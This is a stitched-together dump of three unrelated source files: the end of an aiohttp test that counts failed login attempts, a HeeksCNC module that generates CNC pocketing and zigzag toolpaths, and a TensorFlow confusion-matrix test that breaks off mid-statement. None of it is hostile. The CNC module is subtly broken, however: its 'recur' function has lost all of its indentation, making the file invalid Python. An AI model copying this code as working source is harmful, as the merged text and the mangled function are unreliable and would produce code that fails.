        if "auth_true" in request.path:
            request[KEY_AUTHENTICATED] = True
        else:
            request[KEY_AUTHENTICATED] = False
        return await handler(request)

    app.middlewares.append(mock_auth)

    client = await aiohttp_client(app)

    resp = await client.get("/auth_false")
    assert resp.status == 401
    assert app[KEY_FAILED_LOGIN_ATTEMPTS][remote_ip] == 1

    resp = await client.get("/auth_false")
    assert resp.status == 401
    assert app[KEY_FAILED_LOGIN_ATTEMPTS][remote_ip] == 2

    # Auth-free view: counter must not change.
    resp = await client.get("/")
    assert resp.status == 200
    assert app[KEY_FAILED_LOGIN_ATTEMPTS][remote_ip] == 2

    # This used to check that with trusted networks we reset login attempts
    # We no longer support trusted networks.
    resp = await client.get("/auth_true")
    assert resp.status == 200
    assert app[KEY_FAILED_LOGIN_ATTEMPTS][remote_ip] == 2
| apache-2.0 |
asmuelle/heekscnc | area_funcs.py | 24 | 15418 | import area
from nc.nc import *
import math
import kurve_funcs
# some globals, to save passing variables as parameters too much
area_for_feed_possible = None  # area the tool may traverse while feeding with the tool down (set by pocket())
tool_radius_for_pocket = None  # radius of the current pocketing tool (set by pocket())
def cut_curve(curve, need_rapid, p, rapid_safety_space, current_start_depth, final_depth):
    """Emit toolpath moves (via the nc.nc writer) for one curve.

    When need_rapid is true, rapid to the curve's first vertex, rapid down to
    the safety plane and feed to final_depth; otherwise continue feeding from
    the current position.  Returns the last point reached.
    """
    prev_p = p
    first = True

    for vertex in curve.getVertices():
        if need_rapid and first:
            # rapid across
            rapid(vertex.p.x, vertex.p.y)

            ##rapid down
            rapid(z = current_start_depth + rapid_safety_space)

            #feed down
            feed(z = final_depth)
            first = False
        else:
            # vertex.type: 1 = ccw arc, -1 = cw arc, otherwise a straight line
            if vertex.type == 1:
                arc_ccw(vertex.p.x, vertex.p.y, i = vertex.c.x, j = vertex.c.y)
            elif vertex.type == -1:
                arc_cw(vertex.p.x, vertex.p.y, i = vertex.c.x, j = vertex.c.y)
            else:
                feed(vertex.p.x, vertex.p.y)

        prev_p = vertex.p

    return prev_p
def area_distance(a, old_area):
    """Return the smallest distance between two areas' outlines.

    Checks every vertex of each area against the nearest point on the other
    area's outline (both directions, since nearest-point is not symmetric).

    a, old_area -- objects exposing getCurves() (curves expose getVertices(),
                   vertices expose .p) and NearestPoint(point); points expose
                   dist(other).
    Returns the minimum distance found, or None if both areas are empty.
    """
    best_dist = None

    # Vertices of a against the outline of old_area.
    for curve in a.getCurves():
        for vertex in curve.getVertices():
            c = old_area.NearestPoint(vertex.p)
            d = c.dist(vertex.p)
            if best_dist is None or d < best_dist:
                best_dist = d

    # And vertices of old_area against the outline of a.
    for curve in old_area.getCurves():
        for vertex in curve.getVertices():
            c = a.NearestPoint(vertex.p)
            d = c.dist(vertex.p)
            if best_dist is None or d < best_dist:
                best_dist = d

    return best_dist
def make_obround(p0, p1, radius):
    """Build an obround (stadium shape): the area swept by a circle of
    *radius* moving in a straight line from p0 to p1.

    The outline is the two straight sides offset *radius* either side of the
    p0->p1 axis, closed with arcs centred on p1 and p0 (vertex type 1).
    """
    # Fixes vs. original: renamed local 'dir' (shadowed the builtin) and
    # dropped the unused 'd = dir.length()' local.
    direction = p1 - p0
    direction.normalize()
    # Unit vector perpendicular to the travel direction.
    right = area.Point(direction.y, -direction.x)

    obround = area.Area()
    c = area.Curve()
    vt0 = p0 + right * radius
    vt1 = p1 + right * radius
    vt2 = p1 - right * radius
    vt3 = p0 - right * radius
    c.append(area.Vertex(0, vt0, area.Point(0, 0)))
    c.append(area.Vertex(0, vt1, area.Point(0, 0)))
    c.append(area.Vertex(1, vt2, p1))  # arc around p1
    c.append(area.Vertex(0, vt3, area.Point(0, 0)))
    c.append(area.Vertex(1, vt0, p0))  # arc around p0
    obround.append(c)
    return obround
def feed_possible(p0, p1):
    """Return True when the tool can move from p0 to p1 with the tool down.

    The straight-line sweep of the tool (an obround of the current tool
    radius) must lie entirely inside area_for_feed_possible.
    """
    if p0 == p1:
        return True

    swept = make_obround(p0, p1, tool_radius_for_pocket)
    allowed = area.Area(area_for_feed_possible)
    swept.Subtract(allowed)
    # Anything left of the sweep lies outside the allowed area.
    return swept.num_curves() == 0
def cut_curvelist1(curve_list, rapid_safety_space, current_start_depth, depth, clearance_height, keep_tool_down_if_poss):
    """Cut every curve in curve_list at the given depth.

    Between curves the tool either stays down (when a straight feed between
    the end and next start is possible, or they coincide) or rapids up to
    clearance_height first.
    """
    p = area.Point(0, 0)
    first = True
    for curve in curve_list:
        need_rapid = True
        if first == False:
            s = curve.FirstVertex().p
            if keep_tool_down_if_poss == True:
                # see if we can feed across
                if feed_possible(p, s):
                    need_rapid = False
            elif s.x == p.x and s.y == p.y:
                need_rapid = False

        if need_rapid:
            rapid(z = clearance_height)
        p = cut_curve(curve, need_rapid, p, rapid_safety_space, current_start_depth, depth)
        first = False

    rapid(z = clearance_height)
def cut_curvelist2(curve_list, rapid_safety_space, current_start_depth, depth, clearance_height, keep_tool_down_if_poss, start_point):
    """Variant of cut_curvelist1 that profiles the first curve from an
    explicit (x, y) start_point via kurve_funcs, then cuts the rest like
    cut_curvelist1."""
    p = area.Point(0, 0)
    start_x, start_y = start_point
    first = True
    for curve in curve_list:
        need_rapid = True
        if first == True:
            # NOTE(review): the bare 'rapid_safety_space' below is a no-op
            # expression left over between assignments.
            direction = "on";radius = 0.0;offset_extra = 0.0; roll_radius = 0.0;roll_on = 0.0; roll_off = 0.0; rapid_safety_space; step_down = math.fabs(depth);extend_at_start = 0.0;extend_at_end = 0.0
            kurve_funcs.make_smaller( curve, start = area.Point(start_x, start_y))
            kurve_funcs.profile(curve, direction, radius , offset_extra, roll_radius, roll_on, roll_off, rapid_safety_space , clearance_height, current_start_depth, step_down , depth, extend_at_start, extend_at_end)
        else:
            s = curve.FirstVertex().p
            if keep_tool_down_if_poss == True:
                # see if we can feed across
                if feed_possible(p, s):
                    need_rapid = False
            elif s.x == p.x and s.y == p.y:
                need_rapid = False
            cut_curve(curve, need_rapid, p, rapid_safety_space, current_start_depth, depth)
        first = False #change to True if you want to rapid back to start side before zigging again with unidirectional set

    rapid(z = clearance_height)
def recur(arealist, a1, stepover, from_center):
# this makes arealist by recursively offsetting a1 inwards
if a1.num_curves() == 0:
return
if from_center:
arealist.insert(0, a1)
else:
arealist.append(a1)
a_offset = area.Area(a1)
a_offset.Offset(stepover)
# split curves into new areas
if area.holes_linked():
for curve in a_offset.getCurves():
a2 = area.Area()
a2.append(curve)
recur(arealist, a2, stepover, from_center)
else:
# split curves into new areas
a_offset.Reorder()
a2 = None
for curve in a_offset.getCurves():
if curve.IsClockwise():
if a2 != None:
a2.append(curve)
else:
if a2 != None:
recur(arealist, a2, stepover, from_center)
a2 = area.Area()
a2.append(curve)
if a2 != None:
recur(arealist, a2, stepover, from_center)
def get_curve_list(arealist, reverse_curves=False):
    """Flatten a list of areas into a single list of their curves.

    arealist       -- iterable of objects exposing getCurves()
    reverse_curves -- when truthy, reverse each curve in place before
                      collecting it (used for climb cutting)
    """
    # Fixes vs. original: '[]' literal instead of list(), and truthiness test
    # instead of '== True' (backward compatible; callers pass a bool).
    curve_list = []
    for a in arealist:
        for curve in a.getCurves():
            if reverse_curves:
                curve.Reverse()
            curve_list.append(curve)
    return curve_list
# Module state used while generating zigzag toolpaths (initialised by zigzag()).
curve_list_for_zigs = []          # zig curves collected by make_zig_curve(), later reordered
rightward_for_zigs = True         # current zig direction; flipped per scanline unless unidirectional
sin_angle_for_zigs = 0.0          # sin/cos of -zig_angle: rotate the area into scanline space
cos_angle_for_zigs = 1.0
sin_minus_angle_for_zigs = 0.0    # sin/cos of +zig_angle: rotate results back
cos_minus_angle_for_zigs = 1.0
one_over_units = 1.0              # 1 / area.get_units(); scales the 0.002 matching tolerance
def make_zig_curve(curve, y0, y, zig_unidirectional):
    """Extract one zig pass from *curve* between scanlines y0 and y.

    The curve is the boundary of the intersection of the area with a one-step
    horizontal strip (see zigzag()).  Starting from a high point, this walks
    the curve to find the run along y0 ("zig") up to where it reaches y
    ("zag"), un-rotates it back to model space and appends it to
    curve_list_for_zigs.  Comparisons use a 0.002 * one_over_units tolerance.
    """
    if rightward_for_zigs:
        curve.Reverse()

    # find a high point to start looking from
    high_point = None
    for vertex in curve.getVertices():
        if high_point == None:
            high_point = vertex.p
        elif vertex.p.y > high_point.y:
            # use this as the new high point
            high_point = vertex.p
        elif math.fabs(vertex.p.y - high_point.y) < 0.002 * one_over_units:
            # equal high point
            if rightward_for_zigs:
                # use the furthest left point
                if vertex.p.x < high_point.x:
                    high_point = vertex.p
            else:
                # use the furthest right point
                if vertex.p.x > high_point.x:
                    high_point = vertex.p

    zig = area.Curve()

    high_point_found = False
    zig_started = False
    zag_found = False

    for i in range(0, 2): # process the curve twice because we don't know where it will start
        prev_p = None
        for vertex in curve.getVertices():
            if zag_found: break
            if prev_p != None:
                if zig_started:
                    zig.append(unrotated_vertex(vertex))
                    if math.fabs(vertex.p.y - y) < 0.002 * one_over_units:
                        zag_found = True
                        break
                elif high_point_found:
                    if math.fabs(vertex.p.y - y0) < 0.002 * one_over_units:
                        if zig_started:
                            zig.append(unrotated_vertex(vertex))
                        elif math.fabs(prev_p.y - y0) < 0.002 * one_over_units and vertex.type == 0:
                            # Straight segment lying on y0: this starts the zig.
                            zig.append(area.Vertex(0, unrotated_point(prev_p), area.Point(0, 0)))
                            zig.append(unrotated_vertex(vertex))
                            zig_started = True
                elif vertex.p.x == high_point.x and vertex.p.y == high_point.y:
                    high_point_found = True
            prev_p = vertex.p

    if zig_started:
        if zig_unidirectional == True:
            # remove the last bit of zig
            if math.fabs(zig.LastVertex().p.y - y) < 0.002 * one_over_units:
                vertices = zig.getVertices()
                while len(vertices) > 0:
                    v = vertices[len(vertices)-1]
                    if math.fabs(v.p.y - y0) < 0.002 * one_over_units:
                        break
                    else:
                        vertices.pop()
                zig = area.Curve()
                for v in vertices:
                    zig.append(v)
        curve_list_for_zigs.append(zig)
def make_zig(a, y0, y, zig_unidirectional):
    """Generate a zig pass for each curve of area *a* in the strip [y0, y]."""
    for strip_curve in a.getCurves():
        make_zig_curve(strip_curve, y0, y, zig_unidirectional)
# Lists of zig curves grouped into chains whose ends meet (built by reorder_zigs()).
reorder_zig_list_list = []

def add_reorder_zig(curve):
    """Append *curve* to an existing chain whose end matches its start
    (within tolerance), or start a new chain."""
    global reorder_zig_list_list

    # look in existing lists
    s = curve.FirstVertex().p
    for curve_list in reorder_zig_list_list:
        last_curve = curve_list[len(curve_list) - 1]
        e = last_curve.LastVertex().p
        if math.fabs(s.x - e.x) < 0.002 * one_over_units and math.fabs(s.y - e.y) < 0.002 * one_over_units:
            curve_list.append(curve)
            return

    # else add a new list
    curve_list = []
    curve_list.append(curve)
    reorder_zig_list_list.append(curve_list)
def reorder_zigs():
    """Rebuild curve_list_for_zigs so that connected zigs are consecutive.

    Groups the collected zigs into chains via add_reorder_zig(), then
    flattens the chains back into curve_list_for_zigs.
    """
    global curve_list_for_zigs
    global reorder_zig_list_list
    reorder_zig_list_list = []
    for curve in curve_list_for_zigs:
        add_reorder_zig(curve)

    curve_list_for_zigs = []
    for curve_list in reorder_zig_list_list:
        for curve in curve_list:
            curve_list_for_zigs.append(curve)
def rotated_point(p):
    # Rotate p about the origin by -zig_angle (into scanline space).
    return area.Point(p.x * cos_angle_for_zigs - p.y * sin_angle_for_zigs, p.x * sin_angle_for_zigs + p.y * cos_angle_for_zigs)
def unrotated_point(p):
    # Inverse of rotated_point(): rotate back by +zig_angle into model space.
    return area.Point(p.x * cos_minus_angle_for_zigs - p.y * sin_minus_angle_for_zigs, p.x * sin_minus_angle_for_zigs + p.y * cos_minus_angle_for_zigs)
def rotated_vertex(v):
    # Rotate a vertex; arcs (non-zero type) also need their centre point rotated.
    if v.type:
        return area.Vertex(v.type, rotated_point(v.p), rotated_point(v.c))
    return area.Vertex(v.type, rotated_point(v.p), area.Point(0, 0))
def unrotated_vertex(v):
    # Inverse of rotated_vertex(): rotate the vertex (and arc centre) back.
    if v.type:
        return area.Vertex(v.type, unrotated_point(v.p), unrotated_point(v.c))
    return area.Vertex(v.type, unrotated_point(v.p), area.Point(0, 0))
def rotated_area(a):
    """Return a copy of area *a* with every vertex rotated by the configured
    zig angle (via rotated_vertex)."""
    result = area.Area()
    for src_curve in a.getCurves():
        rotated_curve = area.Curve()
        for vtx in src_curve.getVertices():
            rotated_curve.append(rotated_vertex(vtx))
        result.append(rotated_curve)
    return result
def zigzag(a, stepover, zig_unidirectional):
    """Fill area *a* with parallel zigzag passes, one per stepover.

    Works in a rotated frame (set up by the caller via the zig angle globals):
    the area is rotated, sliced into horizontal strips one stepover tall, and
    each strip's intersection with the area yields zig curves that are
    un-rotated back.  Results accumulate in curve_list_for_zigs.
    """
    if a.num_curves() == 0:
        return

    global rightward_for_zigs
    global curve_list_for_zigs
    global sin_angle_for_zigs
    global cos_angle_for_zigs
    global sin_minus_angle_for_zigs
    global cos_minus_angle_for_zigs
    global one_over_units

    one_over_units = 1 / area.get_units()

    a = rotated_area(a)

    b = area.Box()
    a.GetBox(b)

    # Extend the strip rectangles past the area so intersections are clean.
    x0 = b.MinX() - 1.0
    x1 = b.MaxX() + 1.0

    height = b.MaxY() - b.MinY()
    num_steps = int(height / stepover + 1)
    y = b.MinY() + 0.1 * one_over_units
    null_point = area.Point(0, 0)
    rightward_for_zigs = True
    curve_list_for_zigs = []

    for i in range(0, num_steps):
        y0 = y
        y = y + stepover
        # Rectangle covering this scanline strip.
        p0 = area.Point(x0, y0)
        p1 = area.Point(x0, y)
        p2 = area.Point(x1, y)
        p3 = area.Point(x1, y0)
        c = area.Curve()
        c.append(area.Vertex(0, p0, null_point, 0))
        c.append(area.Vertex(0, p1, null_point, 0))
        c.append(area.Vertex(0, p2, null_point, 1))
        c.append(area.Vertex(0, p3, null_point, 0))
        c.append(area.Vertex(0, p0, null_point, 1))
        a2 = area.Area()
        a2.append(c)
        a2.Intersect(a)
        make_zig(a2, y0, y, zig_unidirectional)
        # Alternate direction each pass unless cutting unidirectionally.
        if zig_unidirectional == False:
            rightward_for_zigs = (rightward_for_zigs == False)

    reorder_zigs()
def pocket(a,tool_radius, extra_offset, stepover, depthparams, from_center, keep_tool_down_if_poss, use_zig_zag, zig_angle, zig_unidirectional = False,start_point=None, cut_mode = 'conventional'):
    """Generate a pocketing toolpath for area *a*.

    Builds the 2D curve list either with the area module's built-in pocket
    function (Clipper backend), with zigzag passes, or by recursively
    offsetting inwards, then cuts it at each depth from depthparams.
    start_point, when given, selects the cut_curvelist2 entry strategy.
    """
    global tool_radius_for_pocket
    global area_for_feed_possible

    #if len(a.getCurves()) > 1:
    #    for crv in a.getCurves():
    #        ar = area.Area()
    #        ar.append(crv)
    #        pocket(ar, tool_radius, extra_offset, rapid_safety_space, start_depth, final_depth, stepover, stepdown, clearance_height, from_center, keep_tool_down_if_poss, use_zig_zag, zig_angle, zig_unidirectional)
    #    return

    tool_radius_for_pocket = tool_radius

    if keep_tool_down_if_poss:
        # Slightly shrunk area used by feed_possible() to validate feed moves.
        area_for_feed_possible = area.Area(a)
        area_for_feed_possible.Offset(extra_offset - 0.01)

    use_internal_function = (area.holes_linked() == False) # use internal function, if area module is the Clipper library

    if use_internal_function:
        curve_list = a.MakePocketToolpath(tool_radius, extra_offset, stepover, from_center, use_zig_zag, zig_angle)
    else:
        # Precompute rotation terms for the zigzag frame.
        global sin_angle_for_zigs
        global cos_angle_for_zigs
        global sin_minus_angle_for_zigs
        global cos_minus_angle_for_zigs
        radians_angle = zig_angle * math.pi / 180
        sin_angle_for_zigs = math.sin(-radians_angle)
        cos_angle_for_zigs = math.cos(-radians_angle)
        sin_minus_angle_for_zigs = math.sin(radians_angle)
        cos_minus_angle_for_zigs = math.cos(radians_angle)

        arealist = list()

        a_offset = area.Area(a)
        current_offset = tool_radius + extra_offset
        a_offset.Offset(current_offset)

        do_recursive = True

        if use_zig_zag:
            zigzag(a_offset, stepover, zig_unidirectional)
            curve_list = curve_list_for_zigs
        else:
            if do_recursive:
                recur(arealist, a_offset, stepover, from_center)
            else:
                # Non-recursive fallback: offset inwards step by step.
                while(a_offset.num_curves() > 0):
                    if from_center:
                        arealist.insert(0, a_offset)
                    else:
                        arealist.append(a_offset)
                    current_offset = current_offset + stepover
                    a_offset = area.Area(a)
                    a_offset.Offset(current_offset)
            curve_list = get_curve_list(arealist, cut_mode == 'climb')

    depths = depthparams.get_depths()

    current_start_depth = depthparams.start_depth

    if start_point==None:
        for depth in depths:
            cut_curvelist1(curve_list, depthparams.rapid_safety_space, current_start_depth, depth, depthparams.clearance_height, keep_tool_down_if_poss)
            current_start_depth = depth
    else:
        for depth in depths:
            cut_curvelist2(curve_list, depthparams.rapid_safety_space, current_start_depth, depth, depthparams.clearance_height, keep_tool_down_if_poss, start_point)
            current_start_depth = depth
| bsd-3-clause |
xzturn/tensorflow | tensorflow/python/kernel_tests/confusion_matrix_test.py | 8 | 18371 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for confusion_matrix_ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import confusion_matrix
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.platform import test
class ConfusionMatrixTest(test.TestCase):
  """Tests for the `confusion_matrix.confusion_matrix` op wrapper."""
  @test_util.run_in_graph_and_eager_modes
  def testExample(self):
    """This is a test of the example provided in pydoc."""
    with self.cached_session():
      self.assertAllEqual([
          [0, 0, 0, 0, 0],
          [0, 0, 1, 0, 0],
          [0, 0, 1, 0, 0],
          [0, 0, 0, 0, 0],
          [0, 0, 0, 0, 1]
      ], self.evaluate(confusion_matrix.confusion_matrix(
          labels=[1, 2, 4], predictions=[2, 2, 4])))
  # Helper: builds the op, evaluates it, and checks both values and dtype
  # against `truth` (which may be None when an error is expected instead).
  def _testConfMatrix(self, labels, predictions, truth, weights=None,
                      num_classes=None):
    with self.cached_session():
      dtype = predictions.dtype
      ans = confusion_matrix.confusion_matrix(
          labels, predictions, dtype=dtype, weights=weights,
          num_classes=num_classes).eval()
      self.assertAllClose(truth, ans, atol=1e-10)
      self.assertEqual(ans.dtype, dtype)
  def _testBasic(self, dtype):
    # Perfect predictions on 5 classes -> identity confusion matrix.
    labels = np.arange(5, dtype=dtype)
    predictions = np.arange(5, dtype=dtype)
    truth = np.asarray(
        [[1, 0, 0, 0, 0],
         [0, 1, 0, 0, 0],
         [0, 0, 1, 0, 0],
         [0, 0, 0, 1, 0],
         [0, 0, 0, 0, 1]],
        dtype=dtype)
    self._testConfMatrix(labels=labels, predictions=predictions, truth=truth)
  @test_util.run_deprecated_v1
  def testInt32Basic(self):
    self._testBasic(dtype=np.int32)
  @test_util.run_deprecated_v1
  def testInt64Basic(self):
    self._testBasic(dtype=np.int64)
  # Randomized end-to-end check: binarized normal samples vs. a NumPy-computed
  # confusion matrix.
  def _testConfMatrixOnTensors(self, tf_dtype, np_dtype):
    with self.cached_session() as sess:
      m_neg = array_ops.placeholder(dtype=dtypes.float32)
      m_pos = array_ops.placeholder(dtype=dtypes.float32)
      s = array_ops.placeholder(dtype=dtypes.float32)
      neg = random_ops.random_normal(
          [20], mean=m_neg, stddev=s, dtype=dtypes.float32)
      pos = random_ops.random_normal(
          [20], mean=m_pos, stddev=s, dtype=dtypes.float32)
      data = array_ops.concat([neg, pos], 0)
      data = math_ops.cast(math_ops.round(data), tf_dtype)
      data = math_ops.minimum(math_ops.maximum(data, 0), 1)
      lab = array_ops.concat(
          [
              array_ops.zeros(
                  [20], dtype=tf_dtype), array_ops.ones(
                      [20], dtype=tf_dtype)
          ],
          0)
      cm = confusion_matrix.confusion_matrix(
          lab, data, dtype=tf_dtype, num_classes=2)
      d, l, cm_out = sess.run([data, lab, cm], {m_neg: 0.0, m_pos: 1.0, s: 1.0})
      truth = np.zeros([2, 2], dtype=np_dtype)
      for i in xrange(len(d)):
        truth[l[i], d[i]] += 1
      self.assertEqual(cm_out.dtype, np_dtype)
      self.assertAllClose(cm_out, truth, atol=1e-10)
  @test_util.run_deprecated_v1
  def testOnTensors_int32(self):
    self._testConfMatrixOnTensors(dtypes.int32, np.int32)
  @test_util.run_deprecated_v1
  def testOnTensors_int64(self):
    self._testConfMatrixOnTensors(dtypes.int64, np.int64)
  def _testDifferentLabelsInPredictionAndTarget(self, dtype):
    labels = np.asarray([4, 5, 6], dtype=dtype)
    predictions = np.asarray([1, 2, 3], dtype=dtype)
    truth = np.asarray(
        [[0, 0, 0, 0, 0, 0, 0],
         [0, 0, 0, 0, 0, 0, 0],
         [0, 0, 0, 0, 0, 0, 0],
         [0, 0, 0, 0, 0, 0, 0],
         [0, 1, 0, 0, 0, 0, 0],
         [0, 0, 1, 0, 0, 0, 0],
         [0, 0, 0, 1, 0, 0, 0]],
        dtype=dtype)
    self._testConfMatrix(labels=labels, predictions=predictions, truth=truth)
  @test_util.run_deprecated_v1
  def testInt32DifferentLabels(self, dtype=np.int32):
    self._testDifferentLabelsInPredictionAndTarget(dtype)
  @test_util.run_deprecated_v1
  def testInt64DifferentLabels(self, dtype=np.int64):
    self._testDifferentLabelsInPredictionAndTarget(dtype)
  def _testMultipleLabels(self, dtype):
    labels = np.asarray([1, 1, 2, 3, 5, 1, 3, 6, 3, 1], dtype=dtype)
    predictions = np.asarray([1, 1, 2, 3, 5, 6, 1, 2, 3, 4], dtype=dtype)
    truth = np.asarray(
        [[0, 0, 0, 0, 0, 0, 0],
         [0, 2, 0, 0, 1, 0, 1],
         [0, 0, 1, 0, 0, 0, 0],
         [0, 1, 0, 2, 0, 0, 0],
         [0, 0, 0, 0, 0, 0, 0],
         [0, 0, 0, 0, 0, 1, 0],
         [0, 0, 1, 0, 0, 0, 0]],
        dtype=dtype)
    self._testConfMatrix(labels=labels, predictions=predictions, truth=truth)
  @test_util.run_deprecated_v1
  def testInt32MultipleLabels(self, dtype=np.int32):
    self._testMultipleLabels(dtype)
  @test_util.run_deprecated_v1
  def testInt64MultipleLabels(self, dtype=np.int64):
    self._testMultipleLabels(dtype)
  @test_util.run_deprecated_v1
  def testWeighted(self):
    # Diagonal entries weighted by the per-example weight.
    labels = np.arange(5, dtype=np.int32)
    predictions = np.arange(5, dtype=np.int32)
    weights = np.arange(5, dtype=np.int32)
    truth = np.asarray(
        [[0, 0, 0, 0, 0],
         [0, 1, 0, 0, 0],
         [0, 0, 2, 0, 0],
         [0, 0, 0, 3, 0],
         [0, 0, 0, 0, 4]],
        dtype=np.int32)
    self._testConfMatrix(
        labels=labels, predictions=predictions, weights=weights, truth=truth)
  @test_util.run_deprecated_v1
  def testLabelsTooLarge(self):
    labels = np.asarray([1, 1, 0, 3, 5], dtype=np.int32)
    predictions = np.asarray([2, 1, 0, 2, 2], dtype=np.int32)
    with self.assertRaisesOpError("`labels`.*x < y"):
      self._testConfMatrix(
          labels=labels, predictions=predictions, num_classes=3, truth=None)
  def testLabelsNegative(self):
    labels = np.asarray([1, 1, 0, -1, -1], dtype=np.int32)
    predictions = np.asarray([2, 1, 0, 2, 2], dtype=np.int32)
    with self.assertRaisesOpError("`labels`.*negative values"):
      self._testConfMatrix(
          labels=labels, predictions=predictions, num_classes=3, truth=None)
  @test_util.run_deprecated_v1
  def testPredictionsTooLarge(self):
    labels = np.asarray([1, 1, 0, 2, 2], dtype=np.int32)
    predictions = np.asarray([2, 1, 0, 3, 5], dtype=np.int32)
    with self.assertRaisesOpError("`predictions`.*x < y"):
      self._testConfMatrix(
          labels=labels, predictions=predictions, num_classes=3, truth=None)
  def testPredictionsNegative(self):
    labels = np.asarray([1, 1, 0, 2, 2], dtype=np.int32)
    predictions = np.asarray([2, 1, 0, -1, -1], dtype=np.int32)
    with self.assertRaisesOpError("`predictions`.*negative values"):
      self._testConfMatrix(
          labels=labels, predictions=predictions, num_classes=3, truth=None)
  @test_util.run_deprecated_v1
  def testInputDifferentSize(self):
    labels = np.asarray([1, 2])
    predictions = np.asarray([1, 2, 3])
    # NOTE(review): assertRaisesRegexp is the deprecated alias of
    # assertRaisesRegex; kept as-is for this code base's Python 2 support.
    self.assertRaisesRegexp(ValueError, "must be equal",
                            confusion_matrix.confusion_matrix, predictions,
                            labels)
  def testOutputIsInt32(self):
    labels = np.arange(2)
    predictions = np.arange(2)
    with self.cached_session():
      cm = confusion_matrix.confusion_matrix(
          labels, predictions, dtype=dtypes.int32)
      tf_cm = self.evaluate(cm)
    self.assertEqual(tf_cm.dtype, np.int32)
  def testOutputIsInt64(self):
    labels = np.arange(2)
    predictions = np.arange(2)
    with self.cached_session():
      cm = confusion_matrix.confusion_matrix(
          labels, predictions, dtype=dtypes.int64)
      tf_cm = self.evaluate(cm)
    self.assertEqual(tf_cm.dtype, np.int64)
class RemoveSqueezableDimensionsTest(test.TestCase):
  """Tests for `confusion_matrix.remove_squeezable_dimensions`.

  Each test exercises both the static path (concrete values) and the dynamic
  path (placeholders fed at run time).
  """
  @test_util.run_deprecated_v1
  def testBothScalarShape(self):
    label_values = 1.0
    prediction_values = 0.0
    static_labels, static_predictions = (
        confusion_matrix.remove_squeezable_dimensions(
            label_values, prediction_values))
    labels_placeholder = array_ops.placeholder(dtype=dtypes.float32)
    predictions_placeholder = array_ops.placeholder(dtype=dtypes.float32)
    dynamic_labels, dynamic_predictions = (
        confusion_matrix.remove_squeezable_dimensions(
            labels_placeholder, predictions_placeholder))
    with self.cached_session():
      self.assertAllEqual(label_values, self.evaluate(static_labels))
      self.assertAllEqual(prediction_values, self.evaluate(static_predictions))
      feed_dict = {
          labels_placeholder: label_values,
          predictions_placeholder: prediction_values
      }
      self.assertAllEqual(
          label_values, dynamic_labels.eval(feed_dict=feed_dict))
      self.assertAllEqual(
          prediction_values, dynamic_predictions.eval(feed_dict=feed_dict))
  @test_util.run_deprecated_v1
  def testSameShape(self):
    label_values = np.ones(shape=(2, 3, 1))
    prediction_values = np.zeros_like(label_values)
    static_labels, static_predictions = (
        confusion_matrix.remove_squeezable_dimensions(
            label_values, prediction_values))
    labels_placeholder = array_ops.placeholder(dtype=dtypes.int32)
    predictions_placeholder = array_ops.placeholder(dtype=dtypes.int32)
    dynamic_labels, dynamic_predictions = (
        confusion_matrix.remove_squeezable_dimensions(
            labels_placeholder, predictions_placeholder))
    with self.cached_session():
      self.assertAllEqual(label_values, self.evaluate(static_labels))
      self.assertAllEqual(prediction_values, self.evaluate(static_predictions))
      feed_dict = {
          labels_placeholder: label_values,
          predictions_placeholder: prediction_values
      }
      self.assertAllEqual(
          label_values, dynamic_labels.eval(feed_dict=feed_dict))
      self.assertAllEqual(
          prediction_values, dynamic_predictions.eval(feed_dict=feed_dict))
  @test_util.run_deprecated_v1
  def testSameShapeExpectedRankDiff0(self):
    label_values = np.ones(shape=(2, 3, 1))
    prediction_values = np.zeros_like(label_values)
    static_labels, static_predictions = (
        confusion_matrix.remove_squeezable_dimensions(
            label_values, prediction_values, expected_rank_diff=0))
    labels_placeholder = array_ops.placeholder(dtype=dtypes.int32)
    predictions_placeholder = array_ops.placeholder(dtype=dtypes.int32)
    dynamic_labels, dynamic_predictions = (
        confusion_matrix.remove_squeezable_dimensions(
            labels_placeholder, predictions_placeholder, expected_rank_diff=0))
    with self.cached_session():
      self.assertAllEqual(label_values, self.evaluate(static_labels))
      self.assertAllEqual(prediction_values, self.evaluate(static_predictions))
      feed_dict = {
          labels_placeholder: label_values,
          predictions_placeholder: prediction_values
      }
      self.assertAllEqual(
          label_values, dynamic_labels.eval(feed_dict=feed_dict))
      self.assertAllEqual(
          prediction_values, dynamic_predictions.eval(feed_dict=feed_dict))
  @test_util.run_deprecated_v1
  def testSqueezableLabels(self):
    # Labels have a trailing size-1 dim that should be squeezed away.
    label_values = np.ones(shape=(2, 3, 1))
    prediction_values = np.zeros(shape=(2, 3))
    static_labels, static_predictions = (
        confusion_matrix.remove_squeezable_dimensions(
            label_values, prediction_values))
    labels_placeholder = array_ops.placeholder(dtype=dtypes.int32)
    predictions_placeholder = array_ops.placeholder(dtype=dtypes.int32)
    dynamic_labels, dynamic_predictions = (
        confusion_matrix.remove_squeezable_dimensions(
            labels_placeholder, predictions_placeholder))
    expected_label_values = np.reshape(label_values, newshape=(2, 3))
    with self.cached_session():
      self.assertAllEqual(expected_label_values, self.evaluate(static_labels))
      self.assertAllEqual(prediction_values, self.evaluate(static_predictions))
      feed_dict = {
          labels_placeholder: label_values,
          predictions_placeholder: prediction_values
      }
      self.assertAllEqual(
          expected_label_values, dynamic_labels.eval(feed_dict=feed_dict))
      self.assertAllEqual(
          prediction_values, dynamic_predictions.eval(feed_dict=feed_dict))
  @test_util.run_deprecated_v1
  def testSqueezableLabelsExpectedRankDiffPlus1(self):
    label_values = np.ones(shape=(2, 3, 1))
    prediction_values = np.zeros(shape=(2, 3, 5))
    static_labels, static_predictions = (
        confusion_matrix.remove_squeezable_dimensions(
            label_values, prediction_values, expected_rank_diff=1))
    labels_placeholder = array_ops.placeholder(dtype=dtypes.int32)
    predictions_placeholder = array_ops.placeholder(dtype=dtypes.int32)
    dynamic_labels, dynamic_predictions = (
        confusion_matrix.remove_squeezable_dimensions(
